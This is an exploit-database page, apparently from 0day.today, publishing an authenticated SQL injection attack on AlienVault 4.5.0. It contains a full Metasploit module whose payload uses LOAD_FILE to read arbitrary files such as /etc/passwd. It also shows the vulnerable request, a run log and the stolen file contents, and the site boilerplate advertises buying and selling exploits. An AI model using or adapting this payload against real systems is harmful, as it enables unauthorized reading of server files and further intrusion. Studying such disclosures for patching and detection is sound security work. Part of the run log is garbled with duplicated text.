0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
AlienVault 4.5.0 SQL Injection Vulnerability
The following request is vulnerable to a SQL injection attack from authenticated users. GET /ossim/report/BusinessAndComplianceISOPCI/ISO27001Bar1.php?date_from=2014-02-28&date_to=2014-03-30 HTTP/1.1 Host: 172.31.16.150 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:26.0) Gecko/20100101 Firefox/26.0 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://172.31.16.150/ossim/report/wizard_run.php?run=ZmRzYWZkc2EjIyNhZG1pbg== Cookie: PHPSESSID=jllhuhmphk6ma5q8q2i0hm0mr1; Connection: keep-alive ------------------------------------------------------------------------------------------------ The following metasploit module will exploit this in order to read a file off of the file system: ## ## This module requires Metasploit: http//metasploit.com/download ## Current source: https://github.com/rapid7/metasploit-framework ### require 'msf/core' class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, 'Name' => "AlienVault 4.5.0 authenticated SQL injection arbitrary file read", 'Description' => %q{ AlienVault 4.5.0 is susceptible to an authenticated SQL injection attack via a PNG generation PHP file. This module exploits this to read an arbitrary file from the file system. Any authed user should be usable. Admin not required. }, 'License' => MSF_LICENSE, 'Author' => [ 'Brandon Perry <bperry.volatile[at]gmail.com>' #meatpistol module ], 'References' => [ ], 'Platform' => ['linux'], 'Privileged' => false, 'DisclosureDate' => "Mar 30 2014")) register_options( [ OptString.new('FILEPATH', [ true, 'Path to remote file', '/etc/passwd']), OptString.new('USERNAME', [ true, 'Single username', 'username']), OptString.new('PASSWORD', [ true, 'Single password', 'password']), OptString.new('TARGETURI', [ true, 'Relative URI of installation', '/']) ], self.class) end def run res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'ossim', 'session', 'login.php') }) cookie = res.get_cookies post = { 'embed' => '', 'bookmark_string' => '', 'user' => datastore['USERNAME'], 'passu' => datastore['PASSWORD'], 'pass' => Rex::Text.encode_base64(datastore['PASSWORD']) } res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'ossim', 'session', 'login.php'), 'method' => 'POST', 'vars_post' => post, 'cookie' => cookie }) if res.headers['Location'] != '/ossim/' fail_with('Authentication failed') end cookie = res.get_cookies done = false i = 0 full = '' while !done pay = "2014-02-28' AND (SELECT 1170 FROM(SELECT COUNT(*),CONCAT(0x7175777471," pay << "(SELECT MID((IFNULL(CAST(HEX(LOAD_FILE(0x2f6574632f706173737764)) AS CHAR)," pay << "0x20)),#{(50*i)+1},50)),0x7169716d71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS" pay << " GROUP BY x)a) AND 'xnDa'='xnDa" get = { 'date_from' => pay, 'date_to' => '2014-03-30' } res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'ossim', 'report', 'BusinessAndComplianceISOPCI', 'ISO27001Bar1.php'), 'cookie' => cookie, 'vars_get' => get }) file = /quwtq(.*)qiqmq/.match(res.body) file = file[1] if file == '' done = true end str = [file].pack("H*") full << str vprint_status(str) i = i+1 end path = store_loot('alienvault.file', 'text/plain', datastore['RHOST'], full, datastore['FILEPATH']) print_good("File stored at path: " + path) end end ----------------------------------------------------------------------------- Quick run of the module: msf auxiliary(alienvault_isp27001_sqli) > show options Module options (auxiliary/gather/alienvault_isp27001_sqli): Name Current Setting Required Description ---- --------------- -------- ----------- FILEPATH /etc/passwd yes Path to remote file PASSWORD password yes Single password Proxies no Use a proxy chain RHOST 172.31.16.150 yes The target address RPORT 443 yes The target port TARGETURI / yes Relative URI of installation USERNAME username yes Single username VHOST no HTTP server virtual host msf auxiliary(alienvault_isp27001_sqli) > run [+] File stored at path: /home/bperry/.msf4/loot/20140330080922_default_172.31.16.150_alienvault.file_049766.txt [*] Auxiliary module execution completed 80922_default_172.31.16.150_alienvault.file_049766.txterry/.msf4/loot/201403300 [*] exec: cat /home/bperry/.msf4/loot/20140330080922_default_172.31.16.150_alienvault.file_049766.txt root:x:0:0:root:/root:/usr/bin/llshell daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh sshd:x:101:65534::/var/run/sshd:/usr/sbin/nologin munin:x:102:104::/var/lib/munin:/bin/false postfix:x:103:106::/var/spool/postfix:/bin/false snmp:x:104:108::/var/lib/snmp:/bin/false hacluster:x:105:109:Heartbeat System Account,,,:/usr/lib/heartbeat:/bin/false ossec:x:1000:1000::/var/ossec/:/bin/false ossecm:x:1001:1000::/var/ossec/:/bin/false ossecr:x:1002:1000::/var/ossec/:/bin/false ntop:x:106:111::/var/lib/ntop:/bin/false snort:x:107:112:Snort IDS:/var/log/snort:/bin/false prads:x:108:113::/home/prads:/bin/false nagios:x:109:114::/var/lib/nagios:/bin/false mysql:x:110:115:MySQL Server,,,:/var/lib/mysql:/bin/false asec:x:111:116:Alienvault smart event system user,,,:/var/lib/asec:/bin/false mongodb:x:112:65534::/home/mongodb:/bin/false avserver:x:113:121:AlienVault SIEM,,,:/home/avserver:/bin/false avidm:x:114:121:AlienVault IDM,,,:/home/avidm:/bin/false stunnel4:x:115:122::/var/run/stunnel4:/bin/false avagent:x:116:121:AlienVault Agent,,,:/home/avagent:/bin/false avapi:x:117:121:AlienVault SIEM,,,:/home/avapi:/bin/bash rabbitmq:x:118:123:RabbitMQ messaging server,,,:/var/lib/rabbitmq:/bin/false avforw:x:119:121:AlienVault SIEM,,,:/home/avforw:/bin/false msf auxiliary(alienvault_isp27001_sqli) > # 0day.today [2024-12-24] #